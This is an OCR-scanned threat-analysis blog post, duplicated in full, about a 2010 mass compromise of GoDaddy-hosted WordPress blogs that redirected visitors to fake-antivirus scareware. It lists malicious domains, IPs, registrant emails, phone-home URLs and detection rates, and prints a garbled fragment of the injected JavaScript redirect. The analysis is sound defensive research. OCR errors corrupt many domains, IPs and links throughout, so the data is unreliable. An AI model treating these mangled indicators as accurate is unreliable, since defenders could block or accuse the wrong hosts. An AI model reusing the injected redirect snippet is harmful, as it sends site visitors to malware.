com/2009/10/koobface-botnet-redirects-facebooks-ip.html 


//vdlogs.zdnet.com/security/?p=4594 
//content .zdnet .com/2346-12691_22-352597 .htm1 


//ddanchev.blogspot 


//ddanchev.blogspot. 
//ddanchev.blogspot. 
://ddanchev. blogspot. 
://ddanchev. blogspot. 
http: 


//ddanchev.blogspot 


. com/2009/10/koobface-botnet-dissected-in-trendmicro.html 
com/2009/08/movement- on-koobface-front-part-two.html 
com/2009/08/movement- on-koobface-front.html 
com/2009/07/koobf ace-come-out-come-out-wherever-you. html 
com/2009/07/dissecting-koobface-worms-twitter. html 


.com/ 


//twitter.com/danchodanchev 


6.4.13 GoDaddy’s Mass WordPress Blogs Compromise Serving 
(2010-04-27 21:22) 


Scareware 
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UPDATED: Thursday, May 13, 2010: Go Daddy posted the following update "[1]What’s Up 
with Go Daddy, WordPress, PHP Exploits and Malware?". 


UPDATED: Thursday, May 06, 2010: The following is a brief update of the campaign’s 
structure, the changed IPs, and the newly introduced scareware samples+phone back loca- 
tions over the past few days. 


Sample structure from last week: 

- kdjkfjskdfjlskdjf.com/kp.php - 94.23.242.40 - AS16276, OVH Paris 

- www3.workfree36-td.xorg.pl/?p= - 95.169.186.25 - AS31103, KEYWEB-AS Keyweb AG 

- wwwl.protectsys28-pd.xorg.pl - 94.228.209.182 - AS47869, NETROUTING-AS Netrouting 
Data Facilities 


Hard Drive Antivirus scanner 
al Disk ( 


—_————-- qs 
E <i @ 5 infected Mes 
|? 
| @ ke Werdows Secunty 
& 
Zz w Antnanus Protection Otsabled 


Recommended: Cick “Erase rifected™ to erase al nfected and Erase fected 
suspicious files and make your system protected. = OT 


Ske sone Veen [is 100% 


Detection rate: 

- packupdate _build107 _2045.exe - [2]Gen:Variant.Ursnif.8; TrojanDown- 
loader:Win32/FakeVimes - Result: 23/41 (56.1 %) Phones back to update2.safelinkhere.net 
and updatel1.safelinkhere.net. 


Sample structure from this week: 

- kdjkfjskdfjlskdjf.com/kp.php - 91.188.59.98 - AS6851, BKCNET "SIA" IZZI 

- www4.suitcase52td.net/?p= - 78.46.218.249 - AS24940, HETZNER-AS Hetzner Online AG RZ 
- wwwl.safetypcwork5.net/?p= - 209.212.147.244 - AS32181, ASN-CQ-GIGENET Colo- 
Quest/GigeNet ASN 

- www1.safeyourpc22-pr.com - 209.212.147.246 - Email: gkook@checkjemail.nl 


Detection rate: 
- packupdate build9 2045.exe - [3]Trojan.Fakealert.7869; Mal/FakeAV-BW - Result: 9/41 
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(21.95 %) 


Sample phones back to: 

- update2.keepinsafety.net /?jbjyhxs=kdjfOtXm1J2aONei2Mrh24U %3D 

- www5.my-security-engine.net 

- report.land-protection.com /Reports/SoftServiceReport.php?verint - 91.207.192.24 - Email: 
gkook@checkjemail.nl 

- secure2.securexzone.net/?abbr=MSE &pid=3 - 78.159.108.170 - Emaikl: 
gkook@checkjemail.nl 

- 173.232.149.92 /chrome/report.html?uid=2045 &wv=wvXP & 

- 74.118.193.47 /report.html?wv=wvXP &uid=50 &ling= 

- 74.125.45.100 

- updatel.keepinsafety.net - 94.228.209.223 - Email: gkook@checkjemail.nl 


Related scareware domains part of the ongoing campaign are also parked on the follow- 
ing IPs: 

78.46.218.249 

www3.workfree20-td.xorg.pl 

www3.nojimba52-td.xorg.pl 

www3.workfree25-td.xorg.pl 


{® 


your Computer, Wiedows Web Security 
and ready to remove them 


Detected ipyware and adware on you comp tier 
Q Troon soveve 

@ wi2retskyomm 

@ Trojan Zeloacestt 

Q wi2AckanttaBome 

Q wa2ryiwer 


Soveare 6 sofware, whch can gather nformaton from user's comonter 
Crought Internet connection and send them to its creater. Gather 
formatter can be passwords, e-nal adresses ard al That deta, whch o 
moortant fr you 


209.212.147.244 

www1.newsys-scanner.com - Email: gkook@checkjemail.nl 
wwwz2.securesys-scan2.net - Email: gkook@checkjemail.nl 
www1.new-sys-scanner3.net - Email: gkook@checkjemail.nl 
www1.safetypcwork5.net - Email: gkook@checkjemail.nl 
www1.securesyscare9.net - Email: gkook@checkjemail.nl 
www1.freeguard35-pr.net - Email: gkook@checkjemail.nl 


95.169.186.25 
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www4.ararat23.xorg.pl 
www3.sdfhj40-td.xorg.pl 
www3.nojimba45-td.xorg.pl 
www3.workfree36-td.xorg.pl 
www3.nojimba46-td.xorg.pl 
www4.fiting58td.xorg.pl 
www4.birbinsof.net 


94.228.209.182 

www 1.protectsys25-pd.xorg.pl 
www 1.protectsys26-pd.xorg.pl 
www 1.protectsys27-pd.xorg.pl 
www 1.protectsys28-pd.xorg.pl 
www 1.protectsys29-pd.xorg.pl 
www 1.soptvirus32-pr.xorg.pl 
www 1.soptvirus34-pr.xorg.pl 


* new-sys-scanner3,net 


209.212.144.0/20 ——>-__“S_-ge AS32181 


* securesys-scan2_net 


www1.new-sys-scanner3.net ip-209.212.147,.244 servernap.net 


www2.securesys-scan2_net 


209.212.147.246 
wwwz2,.securesys-scan2.com - Email: gkook@checkjemail.nl 
www1.newsys-scannerl1.com - Email: gkook@checkjemail.n! 


UPDATED: Thursday, April 29, 2010: kdjkfjskdfjlskdjf.com/js.php remains active 
and is currently redirecting to www3.workfree36-td.xorg.pl/?p= - 95.169.186.25 and 
www 1.protectsys28-pd.xorg.pl?p= - 94.228.209.182. 


Detection rate: packupdate build107 2045.exe - [4]Suspicious:W32/Malware!Gemini; 
Trojan.Win32.Generic.pak!cobra - Result: 6/41 (14.64 %) phoning back to new domains: 
safelinkhere.net - 94.228.209.223 - Email: gkook@checkjemail.nl 

update2.safelinkhere.net - 93.186.124.93 - Email: gkook@checkjemail.nl 
updatel.safelinkhere.net - 94.228.209.222 - Email: gkook@checkjemail.nl 

- ns1.safelinkhere.net - 74.118.192.23 - Email: gkook@checkjemail.nl 

- ns2.safelinkhere.net - 93.174.92.225 - Email: gkook@checkjemail.nl 


The gkook@checkjemail.nl email was used for scareware registrations in December 2009's 
"[5]A Diverse Portfolio of Fake Security Software - Part Twenty Four". 
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ns1_birbins-of.com 


nsl_cleanupantivirus.com 


nsl.createpe-pescan-korn.net 


nsl.thio22nd.net 


ns1.letme-guardyourzone.com 


ns1 letprotectsystem.net 


nsl.my-sotiprotect4 net 


nsl.new-pc-protection.com 


nsl.payment-safetynet 


nsl.romsinkord.com 


nsl_.safelinkhere,net 


nsil.safetyearth.net 


ns1.safetypayments.net 


nsl.save-secure.com 


nsl.search4vir.net 


nsl.systemmdetendercom 


nsl.upscanyourpce-now.com 


Parked on 74.118.192.23, [6]AS46664, VolumeDrive (ns1.safelinkhere.net) are also: 


ns1.birbins-of.com 
ns1.cleanupantivirus.com 
nsl1.createpc-pcscan-korn.net 
ns1.fhio22nd.net 
ns1.letme-guardyourzone.com 
ns1.letprotectsystem.net 
ns1.my-softprotect4.net 
nsl1.new-pc-protection.com 
nsl1.payment-safety.net 
ns1.romsinkord.com 
ns1.safelinkhere.net 
ns1.safetyearth.net 
ns1.safetypayments.net 


74.118.192.0/22 ——AS-p> assess 
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ns1.save-secure.com 
ns1.search4vir.net 
nsl.systemmdefender.com 
ns1.upscanyourpc-now.com 


Parked on 93.174.92.225, [7]AS29073, ECATEL-AS , Ecatel Network (ns2.safelinkhere.net) are 
also: 

marmarams.com 
ns2.cleanupantivirus.com 
ns2.dodtorsans.net 
ns2.fastsearch-protection.com 
ns2.go-searchandscan.net 
ns2.guardsystem-scanner.net 
ns2.hot-cleanofyourpc.com 
ns2.marfilks.net 
ns2.my-systemprotection.net 
ns2.myprotected-system.com 
ns2.myprotection-zone.net 
ns2.mysystemprotection.com 
ns2.new-systemprotection.com 
ns2.newsystem-guard.com 
ns2.onguard-zone.net 
ns2.pcregrtuy.net 
ns2.plotguardto-mypc.com 
ns2.protected-field.com 
ns2.safelinkhere.net 
ns2.scanmypc-online.com 
ns2.search-systemprotect.net 
ns2.searchscan-online.net 
ns2.securemyzone.com 
ns2.systemcec7.com 
ns2.trust-systemprotect.net 
ns2.trustscan-onmyzone.com 
ns2.trustsystemguard.net 
ns2.upscanyour-pcnow.com 
ns2.windows-systemshield.net 
ns2.windows-virusscan.com 
ns2.windowsadditionalguard.net 
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Following last week’s Network Solutions mass compromise of WordPress blogs ([8]Dissecting 
the WordPress Blogs Compromise at Network Solutions), over the weekend a similar incident 
took place GoDaddy, [9]according to WPSecurityLock. 


Since the campaign’s URLs still active, and given the fact that based on historical OSINT, we 
can get even more insights into known operations of cybercriminals profiled before (one of 
the key domains used in the campaign is registered to hilarykneber@yahoo.com. 
Yes, that Hilary Kneber.), it’s time to connect the dots. 


¢ Related Hilary Kneber posts: [10]The Kneber botnet - FAQ; [11]Celebrity-Themed Scare- 
ware Campaign Abusing DocStoc; [12]Dissecting an Ongoing Money Mule Recruitment 
Campaign; [13]Keeping Money Mule Recruiters on a Short Leash - Part Four 


One of the domains used cechirecom.com/js.php - 61.4.82.212 - Email: lee _ger- 
stein@yahoo.co.uk was redirecting to www3.sdfhj40-td.xorg.pl?p= - 95.169.186.25 and 
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from there to www2.burnvirusnow34.xorg.pl?p= - 217.23.5.51. The front page of the cur- 
rently not responding cechirecom.com was returning the following message: 


* "Welcome. Site will be open shortly. Signup, question or abuse please send to lar- 
isadolina@yahoo.com" 


Registered with the same email, larisadolina@yahoo.com, is also another domain known have 
been used in similar attacks from February, 2010 - iss9w8s89xx.org. 


Ow: 1 » Computer > Virus Scanner Search 


a Organize ~ © Views ~ (22 System properties jgq Uninstall or change a program {@ Open Control Panel 


Hard Drive Antivirus scanner 


BB) Documents = Local Disk (C:) 1 - 
a = 2 _ - 
IE Pictures — a 


—_———— 
@ 4 infected files @ 6 infected files 
R Music 


(8 Recently Changed Windows Security 
BR Searches 


B Pubic x) Antivirus Protection Disabled 


Threat Name Threat Level 
@ Trojan.Clampilgen High 
@ Trojan. Thuxemelinf Medium 
@ AdvWare.Hotbar High 
@ Packed.Generk.287 Critical 
@ W32.Fujacks.CElinf Medium 


Local Disk (D:) 


Recommended: Cick “Erase infected" to erase al infected and 
suspicious files and make your system protected. 


Sj 
vowserlE 7: | 100% 
. Operation sys stam: nc Windows Vista |p SECURE SITE 


Parked on 217.23.5.51 are related scareware domains part of the campaign: 
www2.burnvirusnow31.xorg.pl 
www2.burnvirusnow33.xorg.pl 
www2.burnvirusnow34.xorg.pl 
www2.trueguardscaner30-p.xorg.pl 
www2.trueguardscaner33-p.xorg.pl 
www 1.savesysops30p.xorg.pl 
www1,.suaguardprotect11p.xorg.pl 
wwwz2.realsafepc32p.xorg.pl 

www 1.suaguardprotect13p.xorg.pl 
www 1.suaguardprotect14p.xorg.pl 
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Detection rate for the scareware: 

- packupdate build107 2045.exe - [14]VirusDoctor; Mal/FakeAV-BW - Result: 14/41 (34.15 
%) with the sample phoning back to the following URLs: 

- update2.,savecompnow.com/index.php?controller=hash - 91.207.192.25 - Email: 
gkook@checkjemail.nl 

- update2.savecompnow.com/index.php?controller=microinstaller 

- updatel.savecompnow.com/index.php?controller=microinstaller - 94.228.209.223 - Email: 
gkook@checkjemail.nl 


The same email was originally seen in December 2009’s "[15]A Diverse Portfolio of Fake Se- 
curity Software - Part Twenty Four". Parked on these IPs are also related phone back locations: 


Parked on 188.124.7.156: 

savecompnow.com - Email: gkook@checkjemail.nl 
securemyfield.com - Email: gkook@checkjemail.nl 
updatel.securepro.xorg.pl 


Parked on 91.207.192.25: 

update2.savecompnow.com - Email: gkook@checkjemail.n| 
update2.xorg.pl 

update2.winsystemupdates.com - Email: gkook@checkjemail.nl 
report.zoneguardland.net - Email: gkook@checkjemail.nl 


Parked on 94.228.209.223: 


updatel.savecompnow.com - Email: gkook@checkjemail.nl 
updatel.winsystemupdates.com 
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* cechirecom.com 


* stablednsstuff.com 
cechirecom.com 
kdjkfiskdfjlskdjf.com 


mail.stablednsstuff.com 


61.4.82.0/23 —AS_», AS17964 
nsl.stablednsstuff.com 


ns2.stablednsstuff.com 
root.cechirecom.com 
root.stablednsstuff.com 


stablednsstuff.com 


Although the cechirecom.com/js.php is not currently responding, parked on_ the 
same IP 61.4.82.212, is another currently active domain, which is registered to hi- 
larykneber@yahoo.com. 


Parked on 61.4.82.212, AS17964, DXTNET Beijing Dian-Xin-Tong Network Technologies 
Co., Ltd.: 

kdjkfjskdfjlskdjf.com - Email: hilarykneber@yahoo.com 

ns1.stablednsstuff.com - Email: lee _gerstein@yahoo.co.uk 

js.ribblestone.com - Email: skeletor71@comcast.net - includes a link pointing to panelscanse- 
curity.org/?affid=320 &subid=landing - 91.212.127.19 - Email: bobarter@xhotmail.net 


The currently active campaign domain redirection is as follows: 
kdjkfjskdfjlskdjf.com/js.php - 61.4.82.212 - Email: hilarykneber@yahoo.com 
- www3.sdfhj40-td.xorg.pl?p= 

- www 1.soptvirus42-pr.xorg.pl?p= - 209.212.149.19 
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Windows Security Center 


Security Center can alert you when your computer might be at risk by 
displaying 4 notification. 


> Yes, protect my PC now (recommended) 


> Don't notify me about threats 


> Don't notify me and don't protect my PC (not 
recommended) 


Parked on 209.212.149.19: 
www2.burnvirusnow43.xorg.pl 
www2.trueguardscaner42-p.xorg.pl 
www1.suaguardprotect23p.xorg.pl 
www2.realsafepc27p.xorg.pl 

www 1.fastfullfind27p.xorg.pl 
www1.yesitssafe-now-forsure.in 


Detection rate for the scareware: 
- packupdate _build106 _2045.exe - [16]TrojanDownloader:Win32/FakeVimes; High Risk 
Cloaked Malware - Result: 7/41 (17.08 %) 


Just like in Network Solution’s case ([17]Dissecting the WordPress Blogs Compromise at 
Network Solutions) the end user always has to be protected from himself using basic security 
auditing practices in regard to default WordPress installations. The rest is wishful thinking, 
that the end user would self-audit himself. 


It seems that hilarykneber@yahoo.com related activities are not going to go away 
anytime soon. 


Related WordPress security resources: 

[18]20 Wordpress Security Plug-ins And Tips To keep Hackers Away 
[19]11 Best Ways to Improve WordPress Security 

[20]20+ Powerful Wordpress Security Plugins and Some Tips and Tricks 
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This post has been reproduced from [21]Dancho Danchev’s blog. Follow him 
[22]on Twitter. 


1. http: //community. godaddy .com/godaddy/whats—up-with-go-daddy-wordpress-php-exploits-and-malware/ 

2, https: //aww.virustoval, con/analisis/38c96f¢7£4027TBbeed9c835424a6186cb9b924 £964 cBabc8b70f2a6f cAfeab- 1272 
3. 
4 
"stp: //adanchev. blogspot. con/2008/10/diverse-por folio-of- fake- security tal 
_hetp: //adanchev. blogspot .con/2010/04/dns~ infrastructure-of-noney-nule.htal 

| http: //ddanchev blogspot .com/2010/04/ns~infrastructure-of-money-mule. ht 

| cep: //ddenchev blogspot. con/2010/04/ dissect ing-vordpress~blogs-compromise. hia 

9. http: //www.wpsecuritylock.com/cechriecom-com-script-wordpress—hacked-on-godaddy-case-study/ 

10. htvp://blogs.zdnet .con/security/?p-6508 

11. netp:/ /ddenchev blogspot. com/2009/12/celebrity-thened scarevare~caupaign_ 07 tall 

12. http: //ddanchev blogspot . com/2010/02/dissect:ing-ongoing-money-mule. htm] 

13. http: //ddanchev blogspot . com/2010/04/keeping-money-mule-recruiters-on-short . html 

14, http://www. virustotal. com/analisis/d10679c06cde2785c4# d8841607 dd44692b4e2e867 c01 Sbfeac294621 a6cebd3- 12723 


to) Z 


15. 
16. 


18. http://blog.taragana.com/index. php/archive/20-wordpress-security-plug- ins-and-tips-to-keep-hackers-away/ 


5 
6 
7 
8 


19. http: //www.problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/ 


20. http://speckyboy .com/2009/09/22/20-powerful-wordpress-security-plugins-and-some-tips-and-tricks/ 


21. http://ddanchev.blogspot.com/ 
22. http://twitter.com/danchodanche 


6.4.14 GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 
(2010-04-27 21:22) 
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e.ctoGNTString()} 


return unescape (da 


meaceturn "“"; 


gavar name=getCookie("pma visited themei"): 


("pma_visited themei”,”1", 


var url="htctp:// d. xorg. pl?p=pSZ2dc¥pkbG6Hnc3 KobnNToRV1i1qH¥nG2 aXxsi YneshvZJubwgs3Ds3bD"; 


Vindowv.top. locatio 


pelse{ 


UPDATED: Thursday, May 13, 2010: Go Daddy posted the following update "[1]What’s 
Up with Go Daddy, WordPress, PHP Exploits and Malware?". 


UPDATED: Thursday, May 06, 2010: The following is a brief update of the campaign’s 
structure, the changed IPs, and the newly introduced scareware samples+phone back loca- 


tions over the past few days. 


Sample structure from last week: 
- kdjkfjskdfjlskdjf.com/kp.php - 94.23.242.40 - AS16276, OVH Paris 
- www3.workfree36-td.xorg.pl/?p= - 95.169.186.25 - AS31103, KEYWEB-AS Keyweb AG 


- www1.protectsys28-pd.xorg.pl - 94.228.209.182 - AS47869, NETROUTING-AS Netrout- 
ing Data Facilities 
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| Hard Drive Antivirus scanner 
EF Leeal Disk (C SPeTe= 
E ” @ 5 infected Mes a 
e 
yp Re Windows Security 
E 
a w Antranas Protection Otabled 
J ~ a ~— 
vw High 
ows Critkal 
0 & High 
O Pac Gitxal 
Recommended: Cick “Erase nifected™ to erase al nfectes and Exase infected } 
suspicous fies and make your aystem protected. nN" 
oe = 100% 
Detection rate: 
- packupdate _build107 _2045.exe - [2]Gen:Variant.Ursnif.8; TrojanDown- 


loader:Win32/FakeVimes - Result: 23/41 (56.1 %) Phones back to update2.safelinkhere.net 
and updatel1.safelinkhere.net. 


Sample structure from this week: 
- kdjkfjskdfjlskdjf.com/kp.php - 91.188.59.98 - AS6851, BKCNET "SIA" IZZI 


- www4.suitcase52td.net/?p= - 78.46.218.249 - AS24940, HETZNER-AS Hetzner Online 
AG RZ 


- wwwl.safetypcwork5.net/?p= - 209.212.147.244 - AS32181, ASN-CQ-GIGENET Colo- 
Quest/GigeNet ASN 


- www1.safeyourpc22-pr.com - 209.212.147.246 - Email: gkook@checkjemail.nl 


Detection rate: 


- packupdate build9 2045.exe - [3]Trojan.Fakealert.7869; Mal/FakeAV-BW - Result: 9/41 
(21.95 %) 
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Sample phones back to: 
- update2.keepinsafety.net /?jbjyhxs=kdjfOtXm1J2aONei2Mrh24U %3D 
- www5.my-security-engine.net 


- report.land-protection.com /Reports/SoftServiceReport.php?verint - 91.207.192.24 - Email: 
gkook@checkjemail.nl 


- secure2.securexzone.net/?abbr=MSE &pid=3 - 78.159.108.170 - Emaikl: 
gkook@checkjemail.nl 


- 173.232.149.92 /chrome/report.html?uid=2045 &wv=wvxXP & 
- 74.118.193.47 /report.html?wv=wvXP &uid=50 &ling= 
- 74.125.45.100 


- updatel.keepinsafety.net - 94.228.209.223 - Email: gkook@checkjemail.nl 


Related scareware domains part of the ongoing campaign are also parked on the follow- 
ing IPs: 


78.46.218.249 
www3.workfree20-td.xorg.pl 
www3.nojimba52-td.xorg.pl 


www3.workfree25-td.xorg.pl 
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System folders 


Sytem Tasks 
eet oe Gal Shared Documents i) My Documents 
fh ir remove progans 
( Creer setergs 
Sag ort ove c:) 
Securtty 
Windows Security 
Security ts affected by virws 


Chedung: C: Documents and Settings|Al Users Aopicaton Oats ponpnet eur 


is rare, which can gether information from user's comouter 


Sorewe ’ 

Srought internet commecton and send then to Gs create. Gather 
formation can be pestwords, e-cnal adresses and af that data, whch o 
moortant for you 


209.212.147.244 

www1.newsys-scanner.com - Email: gkook@checkjemail.nl 
wwwz2.securesys-scan2.net - Email: gkook@checkjemail.nl 
www1.new-sys-scanner3.net - Email: gkook@checkjemail.nl 
www1.safetypcwork5.net - Email: gkook@checkjemail.nl 
www1.securesyscare9.net - Email: gkook@checkjemail.nl 


www1.freeguard35-pr.net - Email: gkxook@checkjemail.nl 


95.169.186.25 
www4.ararat23.xorg.pl 
www3.sdfhj40-td.xorg.pl 
www3.nojimba45-td.xorg.pl 
www3.workfree36-td.xorg.pl 


www3.nojimba46-td.xorg.pl 
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www4.fiting58td.xorg.pl 


www4. birbinsof.net 


94.228.209.182 
www1.protectsys25-pd.xorg.pl 
www1.protectsys26-pd.xorg.pl 
www1.protectsys27-pd.xorg.pl 
www1.protectsys28-pd.xorg.pl 
www1.protectsys29-pd.xorg.pl 
www 1.soptvirus32-pr.xorg.pl 


www 1.soptvirus34-pr.xorg.pl 


* new-sys-scanner3.net 


« securesys-scan2.net 209.212.144.0/20 ——————“S-> 4532181 


ip-209.212.147,244.servernap,net 


www 1.new-sys-scanner3.net 


www2.securesys-scan2 net 


209.212.147.246 
www2.securesys-scan2.com - Email: gkook@checkjemail.nl 


wwwl1.newsys-scannerl.com - Email: gkook@checkjemail.nl 


UPDATED: Thursday, April 29, 2010: kdjkfjskdfjlskdjf.com/js.php remains active 
and is currently redirecting to www3.workfree36-td.xorg.pl/?p= - 95.169.186.25 and 
www1.protectsys28-pd.xorg.pl?p= - 94.228.209.182. 
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Detection rate: packupdate build107 2045.exe - [4]Suspicious:W32/Malware!Gemini; 
Trojan.Win32.Generic.pak!cobra - Result: 6/41 (14.64 %) phoning back to new domains: 


safelinkhere.net - 94.228.209.223 - Email: gkook@checkjemail.nl 
update2.safelinkhere.net - 93.186.124.93 - Email: gkook@checkjemail.nl 
updatel.safelinkhere.net - 94.228.209.222 - Email: gkook@checkjemail.nl 
- ns1.safelinkhere.net - 74.118.192.23 - Email: gkook@checkjemail.nl 


- ns2.safelinkhere.net - 93.174.92.225 - Email: gkook@checkjemail.nl 


The gkook@checkjemail.nl email was used for scareware registrations in December 2009's 
"[5]A Diverse Portfolio of Fake Security Software - Part Twenty Four". 
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ns1.birbins-of.com 
ns1.cleanupantivirus.com 
nsl.createpe-pescan-korn.net 
nsl.thio22nd.net 
ns1.letme-guardyourzone.com 
ns1.letprotectsystem.net 
nsl.my-sottprotect4.net 
nsl.new-pc-protection.com 
ns1,payment-safetynet A Net 74.118.192.0/22 ——AS.pe ass6664 
nsl.romsinkord.com 
nsl_.safelinkhere.net 
nsi.safetyearth.net 
nsl.safetypayments.net 
nsl.save-secure.com 
nsl.search4vir.net 
nsl.systemmdetendercom 


nsl.upscanyourpce-now.com 


Parked on 74.118.192.23, [6]AS46664, VolumeDrive (ns1.safelinkhere.net) are also: 
ns1.birbins-of.com 

ns1.cleanupantivirus.com 

nsl1.createpc-pcscan-korn.net 

ns1.fhio22nd.net 

ns1.letme-guardyourzone.com 


ns1.letprotectsystem.net 
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nsl1.my-softprotect4.net 
nsl1.new-pc-protection.com 
ns1.payment-safety.net 
ns1.romsinkord.com 
ns1.safelinkhere.net 
ns1.safetyearth.net 
ns1.safetypayments.net 
nsl1.save-secure.com 
ns1.search4vir.net 
nsl.systemmdefender.com 


nsl1.upscanyourpc-now.com 


Parked on 93.174.92.225, [7]AS29073, ECATEL-AS , Ecatel Network (ns2.safelinkhere.net) are 
also: 


marmarams.com 
ns2.cleanupantivirus.com 
ns2.dodtorsans.net 
ns2.fastsearch-protection.com 
ns2.go-searchandscan.net 
ns2.guardsystem-scanner.net 
ns2.hot-cleanofyourpc.com 
ns2.marfilks.net 
ns2.my-systemprotection.net 
ns2.myprotected-system.com 


ns2.myprotection-zone.net 
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ns2.mysystemprotection.com 
ns2.new-systemprotection.com 
ns2.newsystem-guard.com 
ns2.onguard-zone.net 
ns2.pcregrtuy.net 
ns2.plotguardto-mypc.com 
ns2.protected-field.com 
ns2.safelinkhere.net 
ns2.scanmypc-online.com 
ns2.search-systemprotect.net 
ns2.searchscan-online.net 
ns2.securemyzone.com 
ns2.systemcec7.com 
ns2.trust-systemprotect.net 
ns2.trustscan-onmyzone.com 
ns2.trustsystemguard.net 
ns2.upscanyour-pcnow.com 
ns2.windows-systemshield.net 


ns2.windows-virusscan.com 


ns2.windowsadditionalguard.net 
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Following last week’s Network Solutions mass compromise of WordPress blogs ([8]Dis- 
secting the WordPress Blogs Compromise at Network Solutions), over the weekend a similar 
incident took place GoDaddy, [9]according to WPSecurityLock. 


Since the campaign’s URLs still active, and given the fact that based on historical OSINT, we 
can get even more insights into known operations of cybercriminals profiled before (one of 
the key domains used in the campaign is registered to hilarykneber@yahoo.com. 
Yes, that Hilary Kneber.), it’s time to connect the dots. 
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¢ Related Hilary Kneber posts: [10]The Kneber botnet - FAQ; [11]Celebrity-Themed Scare- 
ware Campaign Abusing DocStoc; [12]Dissecting an Ongoing Money Mule Recruitment 
Campaign; [13]Keeping Money Mule Recruiters on a Short Leash - Part Four 


One of the domains used cechirecom.com/js.php - 61.4.82.212 - Email: lee _ger- 
stein@yahoo.co.uk was redirecting to www3.sdfhj40-td.xorg.pl?p= - 95.169.186.25 and 
from there to www2.burnvirusnow34.xorg.pl?p= - 217.23.5.51. The front page of the cur- 
rently not responding cechirecom.com was returning the following message: 


¢ "Welcome. Site will be open shortly. Signup, question or abuse please send to lar- 
isadolina@yahoo.com" 


Registered with the same email, larisadolina@yahoo.com, is also another domain known have 
been used in similar attacks from February, 2010 - iss9w8s89xx.org. 


G3 fos == 
OO» = » Computer > Virus Scanner + | +4] | Search Pp 


my Organze + 5. Views + System properties a Uninstall or change a program Open Control Panel 


( ks Hard Drive Antivirus scanner 
BB) Documents ___ Local Disk (C:) 1 ___ Local Disk (D:) 
IB Pictures a mm 
BB music 
(8 Recently Changed Windows Security 
BR Searches 


B Pubic x) Antivirus Protection Disabled 


@ 4 infected files @ 6 infected files 


Threat Name Threat Level 
@ Trojan.Clampilgen High 
@ Trojan. Thuxemelinf Medium 
@ AdvWare.Hotbar High 
@ Packed.Generk.287 Critical 
@ W32.Fujacks.CElinf Medium 


Recommended: Cick “Erase infected” to erase all infected and 
suspicious filles and make your system protected. 


__ # 


— Status 
Browser:IE 7.0 ! 100% 
“ Operation system:Windows Vista SECURE SITE 
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Parked on 217.23.5.51 are related scareware domains part of the campaign: 
www2.burnvirusnow31.xorg.pl 

www2.burnvirusnow33.xorg.pl 

www2.burnvirusnow34.xorg.pl 

www2.trueguardscaner30-p.xorg.pl 

www2.trueguardscaner33-p.xorg.pl 

www 1.savesysops30p.xorg.pl 

www1.suaguardprotect11p.xorg.pl 

www2.realsafepc32p.xorg.pl 

www1,suaguardprotect13p.xorg.pl 


www1.suaguardprotect14p.xorg.pl 


Detection rate for the scareware: 


- packupdate build107 2045.exe - [14]VirusDoctor; Mal/FakeAV-BW - Result: 14/41 (34.15 
%) with the sample phoning back to the following URLs: 


-  update2.savecompnow.com/index.php?controller=hash - 91.207.192.25 - Email: 
gkook@checkjemail.nl 


- update2.savecompnow.com/index.php?controller=microinstaller 


- updatel.savecompnow.com/index.php?controller=microinstaller - 94.228.209.223 - Email: 
gkook@checkjemail.nl 


The same email was originally seen in December 2009’s "[15]A Diverse Portfolio of Fake 
Security Software - Part Twenty Four". Parked on these IPs are also related phone back 
locations: 


Parked on 188.124.7.156: 
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savecompnow.com - Email: gkook@checkjemail.nl 
securemyfield.com - Email: gkook@checkjemail.nl 


updatel1.securepro.xorg.pl 


Parked on 91.207.192.25: 

update2.savecompnow.com - Email: gkook@checkjemail.nl 
update2.xorg.pl 

update2.winsystemupdates.com - Email: gkook@checkjemail.nl 


report.zoneguardland.net - Email: gkook@checkjemail.nl 


Parked on 94.228.209.223: 
updatel.savecompnow.com - Email: gkook@checkjemail.nl 


updatel.winsystemupdates.com 
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* cechirecom.com 


* stablednsstuff.com 
cechirecom.com 
kdjkfiskdfjlskdjf.com 
mail.stablednsstuff.com 
61.4.82.0/23 —AS_», AS17964 
nsl.stablednsstuff.com 
ns2.stablednsstuff.com 
root.cechirecom.com 


root.stablednsstuff.com 


stablednsstuff.com 


Although the cechirecom.com/js.php is not currently responding, parked on _ the 
same IP 61.4.82.212, is another currently active domain, which is registered to hi- 
larykneber@yahoo.com. 


Parked on 61.4.82.212, AS17964, DXTNET Beijing Dian-Xin-Tong Network Technologies 
Co., Ltd.: 


kdjkfjskdfjlskdjf.com - Email: hilarykneber@yahoo.com 
ns1.stablednsstuff.com - Email: lee _gerstein@yahoo.co.uk 


js.ribblestone.com - Email: skeletor71@comcast.net - includes a link pointing to panelscanse- 
curity.org/?affid=320 &subid=landing - 91.212.127.19 - Email: bobarter@xhotmail.net 


The currently active campaign domain redirection is as follows: 
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kdjkfjskdfjlskdjf.com/js.php - 61.4.82.212 - Email: hilarykneber@yahoo.com 
- www3.sdfhj40-td.xorg.pl?p= 


- www 1.soptvirus42-pr.xorg.pl?p= - 209.212.149.19 


Windows Security Center 


(&) Your system is infected. Do you want to protect it ? 
A 


Security Center can alert you when your computer might be at risk by 
displaying 4 notification. 


> Yes, protect my PC now (recommended) 
> Don't notify me about threats 


> Don't notify me and don't protect my PC (not 
recommended) 


Parked on 209.212.149.19: 
www2.burnvirusnow43.xorg.pl 
www2.trueguardscaner42-p.xorg.pl 
www 1.suaguardprotect23p.xorg.pl 
wwwz2.realsafepc27p.xorg.pl 


3353 


www1.fastfullfind27p.xorg.pl 


www 1.yesitssafe-now-forsure.in 


Detection rate for the scareware: 


- packupdate _build106 2045.exe - [16]TrojanDownloader:Win32/FakeVimes; High Risk 
Cloaked Malware - Result: 7/41 (17.08 %) 


Just like in Network Solution’s case ([17]Dissecting the WordPress Blogs Compromise at 
Network Solutions) the end user always has to be protected from himself using basic security 
auditing practices in regard to default WordPress installations. The rest is wishful thinking, 
that the end user would self-audit himself. 


It seems that hilarykneber@yahoo.com related activities are not going to go away 
anytime soon. 


Related WordPress security resources: 
[18]20 Wordpress Security Plug-ins And Tips To keep Hackers Away 
[19]11 Best Ways to Improve WordPress Security 


[20]20+ Powerful Wordpress Security Plugins and Some Tips and Tricks 


This post has been reproduced from [21]Dancho Danchev’s blog. Follow him 
[22]Jon Twitter. 


1. http: //community. godaddy .com/godaddy/whats—up-with-go-daddy-wordpress-php- exploits-and-malware/ 

2. nceps: wou. virustotal .con/analieis/36096fcT£402T2beed9c896124a6 16909092" 36 cBaScOhTOF 26 chad 1273 
3 
4. 
5, Peep //eanchey bLopapot coa/ 2008 /12/aiveroe-portiolio-of-faee aosurity Beal 
